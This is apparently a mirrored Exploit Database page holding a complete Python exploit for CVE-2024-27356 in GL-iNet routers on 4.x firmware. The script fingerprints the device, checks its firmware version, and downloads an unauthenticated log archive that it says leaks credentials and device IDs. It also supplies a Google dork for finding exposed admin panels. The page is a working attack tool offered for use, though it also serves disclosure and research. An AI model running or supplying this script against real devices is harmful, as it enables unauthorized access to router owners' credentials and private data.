GL-iNet MT6000 4.5.5 – Arbitrary File Download

• Exploit Database
• 146 阅读

• 作者： Bandar Alharbi
  日期： 2024-04-02
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51942/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80

  # Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download # CVE: CVE-2024-27356 # Google Dork: intitle:"GL.iNet Admin Panel" # Date: 2/26/2024 # Exploit Author: Bandar Alharbi (aggressor) # Vendor Homepage: www.gl-inet.com # Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin # Tested Model: GL-X3000 Spitz AX # Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md   import sys import requests import json requests.packages.urllib3.disable_warnings() h = {&apos;Content-type&apos;:&apos;application/json;charset=utf-8&apos;, &apos;User-Agent&apos;:&apos;Mozilla/5.0 (compatible;contxbot/1.0)&apos;}   def DoesTarExist(): r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h) if r.status_code == 200: f = open("logread.tar", "wb") f.write(r.content) f.close() print("[*] Full logs archive <code>logread.tar</code> has been downloaded!") print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!") return True else: print("[*] The <code>logread.tar</code> archive does not exist however ... try again later!") return False   def isVulnerable(): r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h) if r1.status_code == 500 and "nginx" in r1.text: r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h) if"Admin-Token" in r2.text: j= {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]} r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h) ver = r3.json()[&apos;result&apos;][&apos;firmware_version&apos;] model = r3.json()[&apos;result&apos;][&apos;model&apos;] if ver.startswith((&apos;4.&apos;)): print("[*] Firmware version (%s) is vulnerable!" %ver) print("[*] Device model is: %s" %model) return True print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!") return False   def isAlive(): try: r = requests.get(url, verify=False, timeout=30, headers=h) if r.status_code != 200: print("[*] Make sure the target&apos;s web interface is accessible!") return False elif r.status_code == 200: print("[*] The target is reachable!") return True except Exception: print("[*] Error occurred when connecting to the target!") pass return False   if __name__ == &apos;__main__&apos;: if len(sys.argv) != 2: print("exploit.py url") sys.exit(0) url = sys.argv[1] url = url.lower() if not url.startswith((&apos;http://&apos;, &apos;https://&apos;)): print("[*] Invalid url format! It should be http[s]://<domain or ip>") sys.exit(0) if url.endswith("/"): url = url.rstrip("/")   print("[*] GL.iNet Unauthenticated Full Logs Downloader")   try: if (isAlive() and isVulnerable()) == (True and True): DoesTarExist() except KeyboardInterrupt: print("[*] The exploit has been stopped by the user!") sys.exit(0)